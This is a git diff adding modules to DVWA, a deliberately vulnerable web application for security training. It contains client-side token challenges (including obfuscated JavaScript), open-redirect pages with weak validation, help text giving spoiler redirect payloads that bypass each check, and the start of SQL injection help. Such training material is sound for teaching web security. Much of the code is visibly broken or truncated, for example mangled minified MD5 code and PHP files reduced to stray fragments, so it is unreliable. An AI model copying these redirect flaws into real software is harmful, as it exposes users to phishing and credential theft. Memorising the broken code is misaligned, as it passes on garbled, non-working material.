+ this.h4 = 0x510e527f;
+ this.h5 = 0x9b05688c;
+ this.h6 = 0x1f83d9ab;
+ this.h7 = 0x5be0cd19;
+ }
+
+ this.block = this.start = this.bytes = this.hBytes = 0;
+ this.finalized = this.hashed = false;
+ this.first = true;
+ this.is224 = is224;
+ }
+
+ Sha256.prototype.update = function (message) {
+ if (this.finalized) {
+ return;
+ }
+ var notString, type = typeof message;
+ if (type !== 'string') {
+ if (type === 'object') {
+ if (message === null) {
+ throw new Error(ERROR);
+ } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) {
+ message = new Uint8Array(message);
+ } else if (!Array.isArray(message)) {
+ if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) {
+ throw new Error(ERROR);
+ }
+ }
+ } else {
+ throw new Error(ERROR);
+ }
+ notString = true;
+ }
+ var code, index = 0, i, length = message.length, blocks = this.blocks;
+
+ while (index < length) {
+ if (this.hashed) {
+ this.hashed = false;
+ blocks[0] = this.block;
+ blocks[16] = blocks[1] = blocks[2] = blocks[3] =
+ blocks[4] = blocks[5] = blocks[6] = blocks[7] =
+ blocks[8] = blocks[9] = blocks[10] = blocks[11] =
+ blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;
+ }
+
+ if (notString) {
+ for (i = this.start; index < length && i < 64; ++index) {
+ blocks[i >> 2] |= message[index] << SHIFT[i++ & 3];
+ }
+ } else {
+ for (i = this.start; index < length && i < 64; ++index) {
+ code = message.charCodeAt(index);
+ if (code < 0x80) {
+ blocks[i >> 2] |= code << SHIFT[i++ & 3];
+ } else if (code < 0x800) {
+ blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];
+ } else if (code < 0xd800 || code >= 0xe000) {
+ blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];
+ } else {
+ code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff));
+ blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];
+ blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];
+ }
+ }
+ }
+
+ this.lastByteIndex = i;
+ this.bytes += i - this.start;
+ if (i >= 64) {
+ this.block = blocks[16];
+ this.start = i - 64;
+ this.hash();
+ this.hashed = true;
+ } else {
+ this.start = i;
+ }
+ }
+ if (this.bytes > 4294967295) {
+ this.hBytes += this.bytes / 4294967296 << 0;
+ this.bytes = this.bytes % 4294967296;
+ }
+ return this;
+ };
+
+ Sha256.prototype.finalize = function () {
+ if (this.finalized) {
+ return;
+ }
+ this.finalized = true;
+ var blocks = this.blocks, i = this.lastByteIndex;
+ blocks[16] = this.block;
+ blocks[i >> 2] |= EXTRA[i & 3];
+ this.block = blocks[16];
+ if (i >= 56) {
+ if (!this.hashed) {
+ this.hash();
+ }
+ blocks[0] = this.block;
+ blocks[16] = blocks[1] = blocks[2] = blocks[3] =
+ blocks[4] = blocks[5] = blocks[6] = blocks[7] =
+ blocks[8] = blocks[9] = blocks[10] = blocks[11] =
+ blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;
+ }
+ blocks[14] = this.hBytes << 3 | this.bytes >>> 29;
+ blocks[15] = this.bytes << 3;
+ this.hash();
+ };
+
+ Sha256.prototype.hash = function () {
+ var a = this.h0, b = this.h1, c = this.h2, d = this.h3, e = this.h4, f = this.h5, g = this.h6,
+ h = this.h7, blocks = this.blocks, j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc;
+
+ for (j = 16; j < 64; ++j) {
+ // rightrotate
+ t1 = blocks[j - 15];
+ s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 14)) ^ (t1 >>> 3);
+ t1 = blocks[j - 2];
+ s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10);
+ blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0;
+ }
+
+ bc = b & c;
+ for (j = 0; j < 64; j += 4) {
+ if (this.first) {
+ if (this.is224) {
+ ab = 300032;
+ t1 = blocks[0] - 1413257819;
+ h = t1 - 150054599 << 0;
+ d = t1 + 24177077 << 0;
+ } else {
+ ab = 704751109;
+ t1 = blocks[0] - 210244248;
+ h = t1 - 1521486534 << 0;
+ d = t1 + 143694565 << 0;
+ }
+ this.first = false;
+ } else {
+ s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10));
+ s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7));
+ ab = a & b;
+ maj = ab ^ (a & c) ^ bc;
+ ch = (e & f) ^ (~e & g);
+ t1 = h + s1 + ch + K[j] + blocks[j];
+ t2 = s0 + maj;
+ h = d + t1 << 0;
+ d = t1 + t2 << 0;
+ }
+ s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10));
+ s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7));
+ da = d & a;
+ maj = da ^ (d & b) ^ ab;
+ ch = (h & e) ^ (~h & f);
+ t1 = g + s1 + ch + K[j + 1] + blocks[j + 1];
+ t2 = s0 + maj;
+ g = c + t1 << 0;
+ c = t1 + t2 << 0;
+ s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10));
+ s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7));
+ cd = c & d;
+ maj = cd ^ (c & a) ^ da;
+ ch = (g & h) ^ (~g & e);
+ t1 = f + s1 + ch + K[j + 2] + blocks[j + 2];
+ t2 = s0 + maj;
+ f = b + t1 << 0;
+ b = t1 + t2 << 0;
+ s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10));
+ s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7));
+ bc = b & c;
+ maj = bc ^ (b & d) ^ cd;
+ ch = (f & g) ^ (~f & h);
+ t1 = e + s1 + ch + K[j + 3] + blocks[j + 3];
+ t2 = s0 + maj;
+ e = a + t1 << 0;
+ a = t1 + t2 << 0;
+ }
+
+ this.h0 = this.h0 + a << 0;
+ this.h1 = this.h1 + b << 0;
+ this.h2 = this.h2 + c << 0;
+ this.h3 = this.h3 + d << 0;
+ this.h4 = this.h4 + e << 0;
+ this.h5 = this.h5 + f << 0;
+ this.h6 = this.h6 + g << 0;
+ this.h7 = this.h7 + h << 0;
+ };
+
+ Sha256.prototype.hex = function () {
+ this.finalize();
+
+ var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5,
+ h6 = this.h6, h7 = this.h7;
+
+ var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] +
+ HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] +
+ HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] +
+ HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] +
+ HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] +
+ HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] +
+ HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] +
+ HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] +
+ HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] +
+ HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] +
+ HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] +
+ HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] +
+ HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] +
+ HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] +
+ HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] +
+ HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] +
+ HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] +
+ HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] +
+ HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] +
+ HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] +
+ HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] +
+ HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] +
+ HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] +
+ HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] +
+ HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] +
+ HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] +
+ HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] +
+ HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F];
+ if (!this.is224) {
+ hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] +
+ HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] +
+ HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] +
+ HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F];
+ }
+ return hex;
+ };
+
+ Sha256.prototype.toString = Sha256.prototype.hex;
+
+ Sha256.prototype.digest = function () {
+ this.finalize();
+
+ var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5,
+ h6 = this.h6, h7 = this.h7;
+
+ var arr = [
+ (h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF,
+ (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF,
+ (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF,
+ (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF,
+ (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF,
+ (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF,
+ (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 & 0xFF
+ ];
+ if (!this.is224) {
+ arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF);
+ }
+ return arr;
+ };
+
+ Sha256.prototype.array = Sha256.prototype.digest;
+
+ Sha256.prototype.arrayBuffer = function () {
+ this.finalize();
+
+ var buffer = new ArrayBuffer(this.is224 ? 28 : 32);
+ var dataView = new DataView(buffer);
+ dataView.setUint32(0, this.h0);
+ dataView.setUint32(4, this.h1);
+ dataView.setUint32(8, this.h2);
+ dataView.setUint32(12, this.h3);
+ dataView.setUint32(16, this.h4);
+ dataView.setUint32(20, this.h5);
+ dataView.setUint32(24, this.h6);
+ if (!this.is224) {
+ dataView.setUint32(28, this.h7);
+ }
+ return buffer;
+ };
+
+ function HmacSha256(key, is224, sharedMemory) {
+ var i, type = typeof key;
+ if (type === 'string') {
+ var bytes = [], length = key.length, index = 0, code;
+ for (i = 0; i < length; ++i) {
+ code = key.charCodeAt(i);
+ if (code < 0x80) {
+ bytes[index++] = code;
+ } else if (code < 0x800) {
+ bytes[index++] = (0xc0 | (code >> 6));
+ bytes[index++] = (0x80 | (code & 0x3f));
+ } else if (code < 0xd800 || code >= 0xe000) {
+ bytes[index++] = (0xe0 | (code >> 12));
+ bytes[index++] = (0x80 | ((code >> 6) & 0x3f));
+ bytes[index++] = (0x80 | (code & 0x3f));
+ } else {
+ code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff));
+ bytes[index++] = (0xf0 | (code >> 18));
+ bytes[index++] = (0x80 | ((code >> 12) & 0x3f));
+ bytes[index++] = (0x80 | ((code >> 6) & 0x3f));
+ bytes[index++] = (0x80 | (code & 0x3f));
+ }
+ }
+ key = bytes;
+ } else {
+ if (type === 'object') {
+ if (key === null) {
+ throw new Error(ERROR);
+ } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) {
+ key = new Uint8Array(key);
+ } else if (!Array.isArray(key)) {
+ if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) {
+ throw new Error(ERROR);
+ }
+ }
+ } else {
+ throw new Error(ERROR);
+ }
+ }
+
+ if (key.length > 64) {
+ key = (new Sha256(is224, true)).update(key).array();
+ }
+
+ var oKeyPad = [], iKeyPad = [];
+ for (i = 0; i < 64; ++i) {
+ var b = key[i] || 0;
+ oKeyPad[i] = 0x5c ^ b;
+ iKeyPad[i] = 0x36 ^ b;
+ }
+
+ Sha256.call(this, is224, sharedMemory);
+
+ this.update(iKeyPad);
+ this.oKeyPad = oKeyPad;
+ this.inner = true;
+ this.sharedMemory = sharedMemory;
+ }
+ HmacSha256.prototype = new Sha256();
+
+ HmacSha256.prototype.finalize = function () {
+ Sha256.prototype.finalize.call(this);
+ if (this.inner) {
+ this.inner = false;
+ var innerHash = this.array();
+ Sha256.call(this, this.is224, this.sharedMemory);
+ this.update(this.oKeyPad);
+ this.update(innerHash);
+ Sha256.prototype.finalize.call(this);
+ }
+ };
+
+ var exports = createMethod();
+ exports.sha256 = exports;
+ exports.sha224 = createMethod(true);
+ exports.sha256.hmac = createHmacMethod();
+ exports.sha224.hmac = createHmacMethod(true);
+
+ if (COMMON_JS) {
+ module.exports = exports;
+ } else {
+ root.sha256 = exports.sha256;
+ root.sha224 = exports.sha224;
+ if (AMD) {
+ define(function () {
+ return exports;
+ });
+ }
+ }
+})();
+
+function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t}
+
+function token_part_3(t, y="ZZ") {
+ document.getElementById("token").value=sha256(document.getElementById("token").value+y)
+}
+
+function token_part_2(e="YY") {
+ document.getElementById("token").value=sha256(e+document.getElementById("token").value)
+}
+
+function token_part_1(a,b) {
+ document.getElementById("token").value=do_something(document.getElementById("phrase").value)
+}
+
+document.getElementById("phrase").value="";
+
+setTimeout(function(){token_part_2("XX")},300);
+
+document.getElementById("send").addEventListener("click", token_part_3);
+
+token_part_1("ABCD", 44);
diff --git a/DVWA/vulnerabilities/javascript/source/impossible.php b/DVWA/vulnerabilities/javascript/source/impossible.php
new file mode 100644
index 00000000..e69de29b
diff --git a/DVWA/vulnerabilities/javascript/source/low.php b/DVWA/vulnerabilities/javascript/source/low.php
new file mode 100644
index 00000000..fc5542c9
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/low.php
@@ -0,0 +1,24 @@
+
+
+/*
+MD5 code from here
+https://github.com/blueimp/JavaScript-MD5
+*/
+
+!function(n){"use strict";function t(n,t){var r=(65535&n)+(65535&t);return(n>>16)+(t>>16)+(r>>16)<<16|65535&r}function r(n,t){return n<>>32-t}function e(n,e,o,u,c,f){return t(r(t(t(e,n),t(u,f)),c),o)}function o(n,t,r,o,u,c,f){return e(t&r|~t&o,n,t,u,c,f)}function u(n,t,r,o,u,c,f){return e(t&o|r&~o,n,t,u,c,f)}function c(n,t,r,o,u,c,f){return e(t^r^o,n,t,u,c,f)}function f(n,t,r,o,u,c,f){return e(r^(t|~o),n,t,u,c,f)}function i(n,r){n[r>>5]|=128<>>9<<4)]=r;var e,i,a,d,h,l=1732584193,g=-271733879,v=-1732584194,m=271733878;for(e=0;e>5]>>>t%32&255);return r}function d(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;t>5]|=(255&n.charCodeAt(t/8))<16&&(o=i(o,8*n.length)),r=0;r<16;r+=1)u[r]=909522486^o[r],c[r]=1549556828^o[r];return e=i(u.concat(d(t)),512+8*t.length),a(i(c.concat(e),640))}function g(n){var t,r,e="";for(r=0;r>>4&15)+"0123456789abcdef".charAt(15&t);return e}function v(n){return unescape(encodeURIComponent(n))}function m(n){return h(v(n))}function p(n){return g(m(n))}function s(n,t){return l(v(n),v(t))}function C(n,t){return g(s(n,t))}function A(n,t,r){return t?r?s(t,n):C(t,n):r?m(n):p(n)}"function"==typeof define&&define.amd?define(function(){return A}):"object"==typeof module&&module.exports?module.exports=A:n.md5=A}(this);
+
+ function rot13(inp) {
+ return inp.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});
+ }
+
+ function generate_token() {
+ var phrase = document.getElementById("phrase").value;
+ document.getElementById("token").value = md5(rot13(phrase));
+ }
+
+ generate_token();
+
+EOF;
+?>
diff --git a/DVWA/vulnerabilities/javascript/source/medium.js b/DVWA/vulnerabilities/javascript/source/medium.js
new file mode 100644
index 00000000..f6c40a06
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/medium.js
@@ -0,0 +1 @@
+function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t}setTimeout(function(){do_elsesomething("XX")},300);function do_elsesomething(e){document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")}
diff --git a/DVWA/vulnerabilities/javascript/source/medium.php b/DVWA/vulnerabilities/javascript/source/medium.php
new file mode 100644
index 00000000..8849b11e
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/medium.php
@@ -0,0 +1,3 @@
+';
+?>
diff --git a/DVWA/vulnerabilities/open_redirect/help/help.php b/DVWA/vulnerabilities/open_redirect/help/help.php
new file mode 100644
index 00000000..d4de60c6
--- /dev/null
+++ b/DVWA/vulnerabilities/open_redirect/help/help.php
@@ -0,0 +1,57 @@
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/open_redirect/source/high.php b/DVWA/vulnerabilities/open_redirect/source/high.php
new file mode 100644
index 00000000..46da8d05
--- /dev/null
+++ b/DVWA/vulnerabilities/open_redirect/source/high.php
@@ -0,0 +1,21 @@
+
+ + You can never trust anything that comes from the user or prevent them from messing with it and so there is no impossible level. +
+EOF; +} else { +$page[ 'body' ] = <<Vulnerability: JavaScript Attacks
+ +
+
+EOF;
+
+$page[ 'body' ] .= "
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/javascript/source/high.js b/DVWA/vulnerabilities/javascript/source/high.js
new file mode 100644
index 00000000..30c3833a
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/high.js
@@ -0,0 +1 @@
+var a=['fromCharCode','toString','replace','BeJ','\x5cw+','Lyg','SuR','(w(){\x273M\x203L\x27;q\x201l=\x273K\x203I\x203J\x20T\x27;q\x201R=1c\x202I===\x271n\x27;q\x20Y=1R?2I:{};p(Y.3N){1R=1O}q\x202L=!1R&&1c\x202M===\x271n\x27;q\x202o=!Y.2S&&1c\x202d===\x271n\x27&&2d.2Q&&2d.2Q.3S;p(2o){Y=3R}z\x20p(2L){Y=2M}q\x202G=!Y.3Q&&1c\x202g===\x271n\x27&&2g.X;q\x202s=1c\x202l===\x27w\x27&&2l.3P;q\x201y=!Y.3H&&1c\x20Z!==\x272T\x27;q\x20m=\x273G\x27.3z(\x27\x27);q\x202w=[-3y,3x,3v,3w];q\x20U=[24,16,8,0];q\x20K=[3A,3B,3F,3E,3D,3C,3T,3U,4d,4c,4b,49,4a,4e,4f,4j,4i,4h,3u,48,47,3Z,3Y,3X,3V,3W,40,41,46,45,43,42,4k,3f,38,36,39,37,34,33,2Y,31,2Z,35,3t,3n,3m,3l,3o,3p,3s,3r,3q,3k,3j,3d,3a,3c,3b,3e,3h,3g,3i,4g];q\x201E=[\x271e\x27,\x2727\x27,\x271G\x27,\x272R\x27];q\x20l=[];p(Y.2S||!1z.1K){1z.1K=w(1x){A\x204C.Q.2U.1I(1x)===\x27[1n\x201z]\x27}}p(1y&&(Y.50||!Z.1N)){Z.1N=w(1x){A\x201c\x201x===\x271n\x27&&1x.1w&&1x.1w.1J===Z}}q\x202m=w(1X,x){A\x20w(s){A\x20O\x20N(x,1d).S(s)[1X]()}};q\x202a=w(x){q\x20P=2m(\x271e\x27,x);p(2o){P=2P(P,x)}P.1T=w(){A\x20O\x20N(x)};P.S=w(s){A\x20P.1T().S(s)};1g(q\x20i=0;i<1E.W;++i){q\x20T=1E[i];P[T]=2m(T,x)}A\x20P};q\x202P=w(P,x){q\x201S=2O(\x222N(\x271S\x27)\x22);q\x201Y=2O(\x222N(\x271w\x27).1Y\x22);q\x202n=x?\x271H\x27:\x271q\x27;q\x202z=w(s){p(1c\x20s===\x272p\x27){A\x201S.2x(2n).S(s,\x274S\x27).1G(\x271e\x27)}z{p(s===2q||s===2T){1u\x20O\x201t(1l)}z\x20p(s.1J===Z){s=O\x202r(s)}}p(1z.1K(s)||Z.1N(s)||s.1J===1Y){A\x201S.2x(2n).S(O\x201Y(s)).1G(\x271e\x27)}z{A\x20P(s)}};A\x202z};q\x202k=w(1X,x){A\x20w(G,s){A\x20O\x201P(G,x,1d).S(s)[1X]()}};q\x202f=w(x){q\x20P=2k(\x271e\x27,x);P.1T=w(G){A\x20O\x201P(G,x)};P.S=w(G,s){A\x20P.1T(G).S(s)};1g(q\x20i=0;i<1E.W;++i){q\x20T=1E[i];P[T]=2k(T,x)}A\x20P};w\x20N(x,1v){p(1v){l[0]=l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0;k.l=l}z{k.l=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]}p(x){k.C=4I;k.B=4H;k.E=4l;k.F=4U;k.J=4J;k.I=4K;k.H=4L;k.D=4T}z{k.C=4X;k.B=4W;k.E=4Y;k.F=4Z;k.J=4V;k.I=4O;k.H=4F;k.D=4s}k.1C=k.1A=k.L=k.2i=0;k.1U=k.1L=1O;k.2j=1d;k.x=x}N.Q.S=w(s){p(k.1U){A}q\x202h,T=1c\x20s;p(T!==\x272p\x27){p(T===\x271n\x27){p(s===2q){1u\x20O\x201t(1l)}z\x20p(1y&&s.1J===Z){s=O\x202r(s)}z\x20p(!1z.1K(s)){p(!1y||!Z.1N(s)){1u\x20O\x201t(1l)}}}z{1u\x20O\x201t(1l)}2h=1d}q\x20r,M=0,i,W=s.W,l=k.l;4t(M+ Submit the word "success" to win. +
+ + $message + + +EOF; +} + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/javascript/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= <<More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://www.w3schools.com/js/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=cs7EQdWO5o0&index=17&list=WL' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://ponyfoo.com/articles/es6-proxies-in-depth' ) . " +
Module developed by Digininja.
+
+
+ +
diff --git a/DVWA/vulnerabilities/open_redirect/index.php b/DVWA/vulnerabilities/open_redirect/index.php
new file mode 100644
index 00000000..29f582dd
--- /dev/null
+++ b/DVWA/vulnerabilities/open_redirect/index.php
@@ -0,0 +1,60 @@
+
+ Help - Open HTTP Redirect
+ +
+
+
+
+
+
+
+ About++ OWASP define this as: + ++ Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. ++ + As suggested above, a common use for this is to create a URL which initially goes to the real site but then redirects the victim off to a site controlled by the attacker. This site could be a clone of the target's login page to steal credentials, a request for credit card details to pay for a service on the target site, or simply a spam page full of advertising. + ++ + Objective+Abuse the redirect page to move the user off the DVWA site or onto a different page on the site than expected. + ++ + Low Level+The redirect page has no limitations, you can redirect to anywhere you want. +Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja + ++ + Medium Level+The code prevents you from using absolute URLs to take the user off the site, so you can either use relative URLs to take them to other pages on the same site or a Protocol-relative URL. + +Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=//digi.ninja + ++ + High Level+The redirect page tries to lock you to only redirect to the info.php page, but does this by checking that the URL contains "info.php". + +Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja/?a=info.php + ++ + Impossible Level+Rather than accepting a page or URL as the redirect target, the system uses ID values to tell the redirect page where to redirect to. This ties the system down to only redirect to pages it knows about and so there is no way for an attacker to modify things to go to a page of their choosing. + + |
+
+ +
Reference:
+Vulnerability: Open HTTP Redirect
+ +
+
+
+ Hacker History
++ Here are two links to some famous hacker quotes, see if you can hack them. +
+ + {$html} +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', "OWASP Unvalidated Redirects and Forwards Cheat Sheet" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', "WSTG - Testing for Client-side URL Redirect") . " +
- " . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', "Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')" ) . " +
You can only redirect to the info page.
+ +Missing redirect target.
+ diff --git a/DVWA/vulnerabilities/open_redirect/source/impossible.php b/DVWA/vulnerabilities/open_redirect/source/impossible.php new file mode 100644 index 00000000..aa9ee9a2 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/impossible.php @@ -0,0 +1,29 @@ + + Unknown redirect target. + +Missing redirect target. diff --git a/DVWA/vulnerabilities/open_redirect/source/info.php b/DVWA/vulnerabilities/open_redirect/source/info.php new file mode 100644 index 00000000..0a12ed8f --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/info.php @@ -0,0 +1,61 @@ +I got a record, I was Zero CoolZero Cool. Crashed 1507 systems in one day, biggest crash in history, front page, New York Times August 10th 1988."; + break; + case 2: + $info = "Who are you anyway?
Johnny.
Johnny who?
Just... Johnny?"; + break; + default: + $info = "Some other stuff"; + } +} + +if ($info == "") { + http_response_code (500); + ?> +
Missing quote ID.
+ +Vulnerability: Open HTTP Redirect
+ + + +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', "OWASP Unvalidated Redirects and Forwards Cheat Sheet" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', "WSTG - Testing for Client-side URL Redirect") . " +
- " . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', "Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')" ) . " +
Missing redirect target.
+ diff --git a/DVWA/vulnerabilities/open_redirect/source/medium.php b/DVWA/vulnerabilities/open_redirect/source/medium.php new file mode 100644 index 00000000..f03f1598 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/medium.php @@ -0,0 +1,21 @@ + +Absolute URLs not allowed.
+ +Missing redirect target.
+ diff --git a/DVWA/vulnerabilities/sqli/help/help.php b/DVWA/vulnerabilities/sqli/help/help.php new file mode 100644 index 00000000..ed811226 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/help/help.php @@ -0,0 +1,60 @@ +
+
+ +
diff --git a/DVWA/vulnerabilities/sqli/index.php b/DVWA/vulnerabilities/sqli/index.php
new file mode 100644
index 00000000..886692a6
--- /dev/null
+++ b/DVWA/vulnerabilities/sqli/index.php
@@ -0,0 +1,82 @@
+
+ Help - SQL Injection
+ +
+
+
+
+
+
+
